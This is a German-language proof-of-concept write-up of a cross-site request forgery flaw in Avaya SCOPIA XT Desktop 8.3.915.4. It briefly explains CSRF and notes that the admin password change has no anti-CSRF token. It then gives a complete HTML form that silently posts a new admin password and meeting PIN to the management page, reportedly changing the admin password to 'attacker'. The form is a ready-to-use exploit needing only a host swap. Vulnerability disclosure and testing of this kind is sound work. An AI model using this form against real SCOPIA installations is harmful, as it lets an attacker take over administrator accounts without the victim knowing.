
Proof-of-Concept zur Demonstration von Cross-Site Request Forgery (CSRF) auf Avaya SCOPIA XT Desktop, das eine Änderung des Admin-Passworts ohne Anti-CSRF-Token ermöglicht.
Dieser PoC beschreibt, wie man Cross-Site Request Forgery (CSRF) bei SCOPIA XT Desktop Version 8.3.915.4 ausnutzt.
Webseite: https://support.avaya.com/products/P1421/scopia-desktop/8.2.1
Cross-Site Request Forgery, auch bekannt als One-Click-Angriff oder Session Riding und als CSRF oder XSRF abgekürzt, ist eine Art von bösartiger Ausnutzung einer Website, bei der nicht autorisierte Befehle von einem Benutzer übertragen werden, dem die Webanwendung vertraut.
Auf der Seite „Directory and Authentication“ kann der Administrator sein Passwort ändern.
Beim Aufzeichnen der Anfrage mit Burp Suite konnte ich feststellen, dass kein Anti-CSRF-Token implementiert war und der einzige Sicherheitsmechanismus das Session-Cookie ist.
6
Ich habe diese HTML-Datei erstellt, die als PoC zur Ausnutzung der dargestellten Schwachstelle diente.
<!DOCTYPE html>
<html>
<body>
<form method="POST" action="http://example.org:80/scopia/admin/directory_settings.jsp">
<input type="text" name="JSESSIONID" value="">
<input type="text" name="newadminusername" value="">
<input type="text" name="newadminpassword" value="3B09A36C1C32CF30EB8169F43227957C">
<input type="text" name="newenablext1000meetingpin" value="false">
<input type="text" name="newxt1000meetingpin" value="EB8169F43227957C">
<input type="text" name="checkstatus" value="true">
<input type="submit" value="Send">
</form>
</body>
</html>
Wenn man sie im Browser ausführt, der ein gültiges Cookie für die SCOPIA-XT-Desktop-Verwaltungsumgebung besitzt, konnte das Passwort des Benutzers admin in „attacker“ geändert werden:
4
5